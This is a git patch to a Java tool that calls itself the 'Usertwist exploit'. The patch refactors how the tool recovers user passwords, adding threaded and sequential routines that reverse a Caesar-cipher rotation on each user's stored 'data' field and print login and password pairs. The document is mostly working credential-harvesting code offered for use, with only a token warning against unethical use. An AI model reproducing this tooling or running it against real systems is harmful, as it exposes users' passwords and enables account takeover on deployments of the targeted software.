From e1e4a26e62fb6da202317568966f021489876b96 Mon Sep 17 00:00:00 2001
From: Mateo <mdm@athelas.fr>
Date: Fri, 2 Aug 2024 09:02:11 +0200
Subject: [PATCH] Asynchronous passwords parsing

---
 src/fr/motysten/usertwist/exploit/Main.java   | 25 ++++++++++----
 .../usertwist/exploit/tools/Cesar.java        |  2 +-
 .../usertwist/exploit/tools/Parser.java       | 33 +++++++++++++++++++
 3 files changed, 52 insertions(+), 8 deletions(-)
 create mode 100644 src/fr/motysten/usertwist/exploit/tools/Parser.java

diff --git a/src/fr/motysten/usertwist/exploit/Main.java b/src/fr/motysten/usertwist/exploit/Main.java
index 49de722..a3c5b73 100644
--- a/src/fr/motysten/usertwist/exploit/Main.java
+++ b/src/fr/motysten/usertwist/exploit/Main.java
@@ -1,6 +1,6 @@
 package fr.motysten.usertwist.exploit;
 
-import fr.motysten.usertwist.exploit.tools.Cesar;
+import fr.motysten.usertwist.exploit.tools.Parser;
 import fr.motysten.usertwist.exploit.tools.Request;
 import org.json.JSONArray;
 import org.json.JSONObject;
@@ -13,6 +13,7 @@ import java.io.InputStreamReader;
 import java.net.http.HttpResponse;
 import java.security.KeyManagementException;
 import java.security.NoSuchAlgorithmException;
+import java.util.Arrays;
 import java.util.HashMap;
 import java.util.Map;
 
@@ -24,10 +25,15 @@ public class Main {
     public static String port = "443";
     public static int rotation = 4;
     public static boolean insecure = false;
+    public static boolean asynchronous = true;
 
     public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
         BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
 
+        if (Arrays.asList(args).contains("--synchronous") || Arrays.asList(args).contains("-s")) {
+            asynchronous = false;
+        }
+
         System.out.println("Usertwist exploit by Motysten");
         System.out.println("Please don't use for unethical purpose !\n");
         String readLine;
@@ -124,13 +130,18 @@ public class Main {
         System.out.println(usersArray.length() + " users found !");
         System.out.println("\nDecrypting passwords...\n");
 
-        for (int i = 0; i < usersArray.length(); i++) {
-            JSONObject user = usersArray.getJSONObject(i);
-            String login = user.getString("username");
-            String password = Cesar.cesarRotate(user.getString("data"), rotation);
-
-            System.out.println((i + 1) + ". " + login + " => " + password);
+        if (asynchronous) {
+            float startTime = System.nanoTime();
+            Parser.asyncGetPass(usersArray, rotation);
+            float elapsedTime = (System.nanoTime() - startTime) / 1000000;
+            System.out.println("Asynchronous elapsed time = " + elapsedTime + "ms");
+        } else {
+            float startTime = System.nanoTime();
+            Parser.getPass(usersArray, rotation);
+            float elapsedTime = (System.nanoTime() - startTime) / 1000000;
+            System.out.println("Synchronous elapsed time = " + elapsedTime + "ms");
         }
+
     }
 
 }
diff --git a/src/fr/motysten/usertwist/exploit/tools/Cesar.java b/src/fr/motysten/usertwist/exploit/tools/Cesar.java
index 4f926ef..fa66b4d 100644
--- a/src/fr/motysten/usertwist/exploit/tools/Cesar.java
+++ b/src/fr/motysten/usertwist/exploit/tools/Cesar.java
@@ -12,7 +12,7 @@ public class Cesar {
         }
 
         StringBuilder output = new StringBuilder();
-
+        
         for (int i = 0; i < input.length(); i++) {
             char newChar = input.charAt(i);
             if (!Character.isDigit(input.charAt(i))) {
diff --git a/src/fr/motysten/usertwist/exploit/tools/Parser.java b/src/fr/motysten/usertwist/exploit/tools/Parser.java
new file mode 100644
index 0000000..739d7a3
--- /dev/null
+++ b/src/fr/motysten/usertwist/exploit/tools/Parser.java
@@ -0,0 +1,33 @@
+package fr.motysten.usertwist.exploit.tools;
+
+import org.json.JSONArray;
+import org.json.JSONObject;
+
+public class Parser {
+
+    public static void getPass(JSONArray usersArray, int rotation) {
+        for (int i = 0; i < usersArray.length(); i++) {
+            JSONObject user = usersArray.getJSONObject(i);
+            String login = user.getString("username");
+            String password = Cesar.cesarRotate(user.getString("data"), rotation);
+
+            System.out.println((i + 1) + ". " + login + " => " + password);
+        }
+    }
+
+    public static void asyncGetPass(JSONArray usersArray, int rotation) {
+
+        for (int i = 0; i < usersArray.length(); i++) {
+
+            int finalI = i;
+            new Thread(() -> {
+                JSONObject user = usersArray.getJSONObject(finalI);
+                String login = user.getString("username");
+                String password = Cesar.cesarRotate(user.getString("data"), rotation);
+
+                System.out.println((finalI + 1) + ". " + login + " => " + password);
+            }).start();
+        }
+    }
+
+}